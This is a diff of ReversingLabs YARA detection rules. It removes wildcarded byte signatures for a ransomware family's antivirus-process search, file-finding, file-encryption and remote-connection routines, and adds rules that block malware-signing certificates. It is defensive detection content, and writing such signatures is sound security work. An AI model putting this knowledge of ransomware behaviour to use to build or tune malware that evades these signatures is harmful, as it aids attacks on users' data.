-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes_v5_0_1 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
-            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
-            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
-            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
-            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
-            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
-            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$set_url_parameters_v5_0_2 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ??
-            ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A
-            ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$set_url_parameters_v5_0_3 = {
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 8C 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            D1 E0 A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? D1 E0 8B D0 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 83 65 ?? ?? 68 ?? ?? ?? ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? FF 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$search_antivirus_processes_v5_0_2 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? BB ?? ?? ?? ?? 57 6A ?? 53 68 ?? ?? ?? ??
-            33 C0 50 FF D6 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? FF D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB
-            ?? 56 33 C9 89 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D
-            58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D
-            0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07
-            33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D
-            ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files_v5_0_2 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
-            6A ?? 56 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8D 44 24 ?? 50 56 FF 15 ?? ??
-            ?? ?? 89 44 24 ?? 8B 4C 24 ?? 33 D2 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
-            44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 44
-            24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ??
-            ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 8B
-            44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
-            8B E5 5D C3
-        }
-		$crypt_files_v5_0_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
-            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0
-            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68
-            ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ??
-            81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ??
-            ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57
-            C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55
-            ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68
-            ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ??
-            ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ??
-            ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ??
-            ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
-            ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ??
-            ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ??
-            89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ??
-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75
-            ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85
-            C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33
-            C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13
-            45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53
-            FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B
-            CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ??
-            FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF
-            D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75
-            ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01
-            8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ??
-            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v5_0_2 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
-            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$crypt_files_v5_0_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 33 DB B9 ?? ?? ?? ?? 89 5D ?? E8
-            ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ??
-            53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 53
-            6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 8D 45 ?? 50 68 ?? ?? ?? ??
-            56 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 81 BE ?? ??
-            ?? ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? FF 70 ?? FF 70 ?? 53 53 57 FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 53 0F 57 C0 66 0F 13 45 ?? FF
-            75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 89 5D ?? 56 8D 4D ?? E8 ?? ??
-            ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 41
-            8B 45 ?? 89 85 ?? ?? ?? ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1
-            ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75
-            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 3B
-            8E ?? ?? ?? ?? 8B 45 ?? 6A ?? 5A 0F 42 C2 39 5D ?? 8B 55 ?? 0F 45 45 ?? 01 8E ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 11 9E ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 50 56 89 45 ??
-            E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 57 FF 15 ?? ?? ?? ?? 8B
-            C3 89 5D ?? 83 F8 ?? 7D ?? 53 8D 45 ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 40 89 45 ?? EB ?? 8B 75 ?? 33 C0 8B 4D ?? 40 01
-            86 ?? ?? ?? ?? 11 9E ?? ?? ?? ?? EB ?? 33 C0 8D 48 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ??
-            ?? 39 5D ?? 74 ?? 6A ?? 53 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ??
-            ?? ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ??
-            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B 45 ?? 57 83 08
-            ?? FF 15 ?? ?? ?? ?? 8B C3 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v5_0_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 8B F1 53
-            50 89 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B FB 0F B7 04 5E 66 85 C0 74 ?? 83 F8 ?? 75 ??
-            83 C3 ?? 56 89 5D ?? FF 15 ?? ?? ?? ?? 3B D8 73 ?? 8D 14 1B 0F B7 04 32 EB ?? 66 83
-            F8 ?? 74 ?? 43 0F B7 04 5E 66 85 C0 75 ?? EB ?? 8B CB 2B 4D ?? 74 ?? 03 F2 8D BD ??
-            ?? ?? ?? D1 E9 F3 A5 13 C9 66 F3 A5 8B 75 ?? 8D 43 ?? 8D 04 46 50 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 33 FF 47 43 85 FF 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 8D 7D ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85
-            FF 74 ?? 51 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 83 EC ?? 57 FF 15 ?? ?? ??
-            ?? 50 57 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B CF 8B
-            F0 E8 ?? ?? ?? ?? EB ?? 33 F6 83 7D ?? ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B C6
-            5E 5B 8B E5 5D C3
-        }
+		id = "71e627d9-0892-5501-8189-26eae36b7965"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12966-L12982"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "cfb2631bc1832f65fb9d77c812bf2a1e05121e825254bd57ae8b21e7b10b2344"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $search_antivirus_processes and $find_files and $crypt_files and $remote_connection ) or ( $find_files_v2 and $crypt_files_v2 and $search_antivirus_processes_v2 and $remote_connection_v2 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $crypt_files_v2_1 and $remote_connection_v2_1 ) or ( $search_antivirus_processes_v4_1_2 and $find_files_v4_1_2 and $crypt_files_v4_1_2 and $remote_connection_v4_1_2 and $url_parameters_setup_v4_1_2 ) or ( $search_antivirus_processes_v4 and $find_files_v4 and $crypt_files_v4 and $url_parameters_setup_v4 ) or ( $search_antivirus_processes_v2 and $find_files_v2_1 and $remote_connection_v2_1 and $crypt_files_v3 ) or ( $search_antivirus_processes_v5 and $find_files_v5 and $crypt_files_v5 and $remote_connection_v5 and $url_parameters_setup_v5 ) or ( $search_antivirus_processes_v5_0_1 and $find_files_v5_0_1 and $crypt_files_v5_0_1 and $url_parameters_setup_v5_0_1 and $remote_connection_v5_0_1 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_2 and $set_url_parameters_v5_0_2 and $remote_connection_v5_0_2 ) or ( $search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_3 and $set_url_parameters_v5_0_3 and $remote_connection_v5_0_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DON'T MISS A WORD LIMITED" and pe.signatures [ i ] . serial == "2d:aa:8d:62:9c:c0:41:0a:94:82:e6:2a:0f:8b:f8:fc" and 1543449600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Targetcompany : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TargetCompany ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7e6983f9-2aca-5cfa-aad6-38aa64fa2062"
-		date = "2021-09-27"
-		modified = "2021-09-27"
+		id = "d133dac3-3959-50f0-913e-b279ca6a1c2c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TargetCompany.yara#L1-L141"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12984-L13002"
